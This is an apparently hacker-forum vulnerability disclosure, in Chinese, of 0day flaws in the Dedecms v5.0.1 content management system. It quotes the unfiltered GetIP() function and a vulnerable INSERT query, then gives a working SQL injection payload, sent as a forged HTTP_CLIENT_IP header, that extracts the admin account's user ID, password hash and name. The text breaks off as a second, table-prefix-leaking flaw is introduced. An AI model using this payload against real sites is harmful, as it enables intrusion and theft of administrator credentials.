Dedecms v501多个0day漏洞暴光.doc

Dedecms v5.0.1多个0day漏洞暴光 Flyh4t 漏洞一：又见getiP() 比较经典的一段漏洞代码出现\include\inc_functions.php中数次将这个函数的结果直接入库，造成了很多处注射漏洞。当然，这个漏洞在dedecms4中也一直存在 ：） -------------------------------------------------------------------------------------------------------------------- //\include\inc_functions.php function GetIP(){//该函数中的$_SERVER变量没有过滤，而且php5环境下不受gpc 影响 if(!empty($_SERVER[HTTP_CLIENT_IP])) $cip = $_SERVER[HTTP_CLIENT_IP]; else if(!empty($_SERVER[HTTP_X_FORWARDED_FOR])) $cip = $_SERVER[HTTP_X_FORWARDED_FOR]; else if(!empty($_SERVER[REMOTE_ADDR])) $cip = $_SERVER[REMOTE_ADDR]; else $cip = 无法获取！; return $cip; } ---------------------------------------------------------------------------------------------------------------------- 这个类型的漏洞已经很多了，我不再详细写了，只拿其中一处写了个poc方面理解：） ------------------------------------------------------------------------------------------------- // \member\story_add_action.php (30) $userip = getip(); $inQuery = INSERT INTO `#@__story_books`(`catid`,`bcatid`,`booktype`,`iscommend`,`click`,`freenum`,`bookname`, `author`,`memberid`,`litpic`,`pubdate`,`ischeck`,`status`, `lastpost`,`postnum`,`lastfeedback`,`fedbacknum`,`weekcc`,`monthcc`,`weekup`,`monthup`, `description`,`body`,`keywords`,`userip`,`senddate` ) VALUES ($catid,$bcatid,$booktype, $iscommend, 0, $freenum, $bookname, $author, {$cfg_ml-M_ID}, $litpic, $pubdate, $ischeck, 0, 0, 0, 0, 0, 0, 0, 0, 0, $description , $body , $keywords, $userip,.mytime().); ;10 ---------------------------------------------------------------------------------------------- 只要伪造HTTP_CLIENT_IP 为11,1173448061),(1, 0, 0, 0, 1, 6,(SELECT concat( userid, 0x5f, pwd, 0x5f, uname ) FROM dede_admin WHERE id =1), flyh4t, 3, 0, 1173448047, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, flyh4t, flyh4t, flyh4t, 即可以注射这个漏洞了（不过这里要求mysql4=4.1，这个版本以上的支持子查询），具体的参考群共享里面的poc.。（dedecms_0day_poc.php） 漏洞二：暴数据库表前缀 这个漏洞和漏洞一是天生的一对，在用户修改了了表前缀的情况下我们的sql注射很难利用起来，但是这个漏洞给了我们一个机会 ：） 看代码： ---------------------------------------------------------------------------------